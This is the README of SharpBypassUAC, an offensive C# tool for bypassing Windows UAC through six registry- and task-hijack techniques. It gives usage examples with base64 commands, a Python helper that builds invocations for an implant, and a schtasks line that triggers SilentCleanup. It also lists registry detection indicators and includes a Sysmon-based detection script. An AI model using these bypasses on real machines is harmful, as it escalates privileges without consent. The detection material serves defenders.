SharpBypassUAC
C# tool for UAC bypasses
Usage
SharpBypassUAC currently supports the eventvwr, fodhelper, computerdefaults, sdclt, slui, and DiskCleanup UAC bypasses.
SharpBypassUAC accepts a base64-encoded Windows command to be executed in high integrity. The command is base64-encoded so it can be passed easily through tools such as Covenant's "Assembly" task. The encoding is of the plain command text (the examples below decode to cmd /c start calc.exe, with "&& REM" appended for DiskCleanup), not the UTF-16LE form that powershell.exe -EncodedCommand expects.
Parameters
-b, --bypass=VALUE Bypass to execute: eventvwr, fodhelper, computerdefaults, sdclt, slui, diskcleanup
-e, --encodedCommand=VALUE Base64 encoded command to execute
Example usage for eventvwr bypass to launch calc.exe
SharpBypassUAC.exe -b eventvwr -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for fodhelper bypass to launch calc.exe
SharpBypassUAC.exe -b fodhelper -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for computerdefaults bypass to launch calc.exe
SharpBypassUAC.exe -b computerdefaults -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for sdclt bypass to launch calc.exe
SharpBypassUAC.exe -b sdclt -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
- Note: this appears to only work on Windows 10 in my testing
Example usage for slui bypass to launch calc.exe
SharpBypassUAC.exe -b slui -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Example usage for DiskCleanup bypass to launch calc.exe
SharpBypassUAC.exe -b diskcleanup -e Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
- Note: The command you execute will need to end in "&& REM". The SilentCleanup task's action begins with %windir%, so once windir is hijacked the remainder of that path is appended after your command; "&& REM" turns the trailing text into a comment so cmd ignores it.
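The following is an added helper for preparing the -e argument; it is not part of SharpBypassUAC. It base64-encodes the plain UTF-8 text of the command exactly as the examples above do (the assertion that the tool expects UTF-8 rather than UTF-16LE is inferred from those examples), appends "&& REM" for the DiskCleanup variant, and decodes the result again so you can confirm what will run before handing it to an implant. The list of bypass names and the "SharpBypassUAC.exe" invocation format are taken from the Parameters section; everything else is this example's own code.

```python
import base64

# Added example, not part of SharpBypassUAC. Builds the -e argument the way the
# README's examples do: base64 over the plain UTF-8 text of the command,
# NOT the UTF-16LE that powershell.exe -EncodedCommand uses.

BYPASSES = ("eventvwr", "fodhelper", "computerdefaults", "sdclt", "slui", "diskcleanup")


def is_supported(bypass: str) -> bool:
    """True if the bypass name is one the README lists."""
    return bypass.lower() in BYPASSES


def encode_command(command: str, bypass: str) -> str:
    """Return the base64 string to pass with -e for the given bypass."""
    bypass = bypass.lower()
    if not is_supported(bypass):
        raise ValueError(f"unsupported bypass: {bypass}")
    command = command.strip()
    if bypass == "diskcleanup" and not command.endswith("&& REM"):
        # SilentCleanup's action starts with %windir%; once that is hijacked the
        # rest of the task's path follows our command, and "&& REM" comments it out.
        command += " && REM"
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Round-trip check: what actually runs after the tool decodes -e."""
    return base64.b64decode(encoded, validate=True).decode("utf-8")


def build_invocation(command: str, bypass: str) -> str:
    """Full command line, e.g. for the arguments field of Covenant's Assembly task."""
    return f"SharpBypassUAC.exe -b {bypass.lower()} -e {encode_command(command, bypass)}"


def powershell_style_base64(command: str) -> str:
    """The UTF-16LE encoding -EncodedCommand expects. Shown only so the mismatch
    with what this tool wants is obvious; do not pass this to -e."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    for name in BYPASSES:
        print(build_invocation("cmd /c start calc.exe", name))
    print("decoded:", decode_command(encode_command("cmd /c start calc.exe", "diskcleanup")))
```

Running the block prints one ready-to-paste line per bypass; the DiskCleanup line carries the "&& REM" suffix automatically, and decode_command lets you verify the payload string before it leaves your operator machine.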
Detections
Most of these bypasses rely on modifying registry keys in the HKCU hive, specifically keys under HKCU\Software\Classes. Because these keys live in the user's own hive, a medium-integrity process can write them without any prompt, so HKCU\Software\Classes\ should be monitored for any new keys or modifications to existing keys. If this is too noisy in your environment, the specific keys used by each technique are listed below. Note that the DiskCleanup variant writes to HKCU\Environment instead, so a rule scoped to Software\Classes alone will miss it.
Eventvwr
Registry modifications to:
- HKCU\Software\Classes\mscfile\Shell\Open\command
- Modifies the "(default)" value with the command to execute
Fodhelper
Registry modifications to:
- HKCU\Software\Classes\ms-settings\Shell\Open\command
- Modifies the "(default)" value with the command to execute
- Modifies the "DelegateExecute" value with an empty value
Computerdefaults
Registry modifications to:
- HKCU\Software\Classes\ms-settings\Shell\Open\command
- Modifies the "(default)" value with the command to execute
- Modifies the "DelegateExecute" value with an empty value
SDCLT
Registry modifications to:
- HKCU\Software\Classes\Folder\shell\open\command
- Modifies the "(default)" value with the command to execute
- Modifies the "DelegateExecute" value with an empty value
SLUI
Registry modifications to:
- HKCU\Software\Classes\exefile\Shell\Open\command
- Modifies the "(default)" value with the command to execute
DiskCleanup
Registry modifications to:
- HKCU\Environment
- Modifies the "windir" value with the command to execute
Starts the "\Microsoft\Windows\DiskCleanup\SilentCleanup" scheduled task. Example:
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
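The detection logic below is an added example that is not part of SharpBypassUAC. It turns the per-technique registry keys and the SilentCleanup task start listed above into matchers and runs them over a handful of constructed Sysmon-style events (registry value set, Event 13; process create, Event 1). It assumes Sysmon reports HKCU\Software\Classes as HKU\<SID>_Classes\... and HKCU\Environment as HKU\<SID>\Environment\...; a literal \Software\Classes\ spelling is accepted too. The SID, paths and event contents are made up for the sample.

```python
import re

# Added example, not part of SharpBypassUAC. Matches the Detections section's
# registry keys and scheduled-task start against Sysmon-style events.
# Assumption: Sysmon writes HKCU\Software\Classes as HKU\<SID>_Classes\... and
# HKCU\Environment as HKU\<SID>\Environment\...; both spellings are accepted.
_USER_SID = r"^hku\\s-1-5-21-[\d-]+"
_USER_CLASSES = _USER_SID + r"(?:_classes|\\software\\classes)\\"
# Event 13 appends the value name to the key path; Event 12 (key create) does not.
_VALUE = r"(?:\\\(default\)|\\delegateexecute)?$"

REGISTRY_SIGNATURES = {
    "eventvwr": re.compile(_USER_CLASSES + r"mscfile\\shell\\open\\command" + _VALUE),
    "fodhelper/computerdefaults": re.compile(_USER_CLASSES + r"ms-settings\\shell\\open\\command" + _VALUE),
    "sdclt": re.compile(_USER_CLASSES + r"folder\\shell\\open\\command" + _VALUE),
    "slui": re.compile(_USER_CLASSES + r"exefile\\shell\\open\\command" + _VALUE),
    "diskcleanup": re.compile(_USER_SID + r"\\environment\\windir$"),
}

# The task start from the README as it appears in a Sysmon Event 1 CommandLine.
SILENTCLEANUP_RUN = re.compile(r"schtasks(?:\.exe)?\b.*\s/run\b.*diskcleanup\\silentcleanup", re.I)


def classify(event):
    """Return (technique, reason) when the event matches an indicator, else None."""
    eid = event.get("EventID")
    if eid in (12, 13, 14):  # Sysmon registry events
        target = event.get("TargetObject", "")
        for technique, sig in REGISTRY_SIGNATURES.items():
            if sig.search(target.lower()):
                return technique, f"{event.get('Image')} wrote {target} = {event.get('Details', '')!r}"
    elif eid == 1:  # Sysmon process create
        cmdline = event.get("CommandLine", "")
        if SILENTCLEANUP_RUN.search(cmdline):
            return "diskcleanup", f"{event.get('Image')} started SilentCleanup: {cmdline}"
    return None


def detect(events):
    """All (technique, reason) hits, in event order."""
    return [hit for hit in map(classify, events) if hit]


def summarize(events):
    """Hit count per technique, useful as a quick triage view."""
    counts = {}
    for technique, _ in detect(events):
        counts[technique] = counts.get(technique, 0) + 1
    return counts


# Constructed sample telemetry, not real logs.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
TOOL = r"C:\Users\alice\AppData\Local\Temp\SharpBypassUAC.exe"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": TOOL, "Details": "",
     "TargetObject": "HKU\\" + SID + r"_Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"EventID": 13, "Image": TOOL, "Details": "cmd /c start calc.exe",
     "TargetObject": "HKU\\" + SID + r"_Classes\ms-settings\Shell\Open\command\(Default)"},
    {"EventID": 13, "Image": TOOL, "Details": "cmd /c start calc.exe && REM",
     "TargetObject": "HKU\\" + SID + r"\Environment\windir"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    # benign noise that must not fire: a file-association write, a machine-hive
    # write by an installer, and a schtasks query rather than a run
    {"EventID": 13, "Image": r"C:\Program Files\Editor\setup.exe", "Details": "txtfile",
     "TargetObject": "HKU\\" + SID + r"_Classes\.txt\(Default)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe", "Details": "",
     "TargetObject": r"HKLM\SOFTWARE\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /Query /TN \Microsoft\Windows\DiskCleanup\SilentCleanup"},
]

if __name__ == "__main__":
    for technique, reason in detect(SAMPLE_EVENTS):
        print(f"[{technique}] {reason}")
    print(summarize(SAMPLE_EVENTS))
```

The matchers anchor on the user hive (HKU\<SID>) deliberately: the same key path under HKLM is a machine-wide write that already required admin rights and is normal installer behaviour, whereas the per-user write is the one a medium-integrity process can make. For DiskCleanup, pairing the windir write with a schtasks /Run of SilentCleanup from the same session is what separates the bypass from an ordinary environment change.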
Credits
eventvwr: enigma0x3's Invoke-EventVwrBypass.ps1 script
fodhelper and computerdefaults: winscripting.blog's FodhelperBypass.ps1 script
sdclt: Emeric Nasi's blog post
slui: bytecode77's slui file handler hijack tool
DiskCleanup: enigma0x3's Bypassing UAC on Windows 10 using Disk Cleanup blog post and gushmazuko's DiskCleanupBypass_direct.ps1 script
Many of these were found by going through the UACME project on GitHub.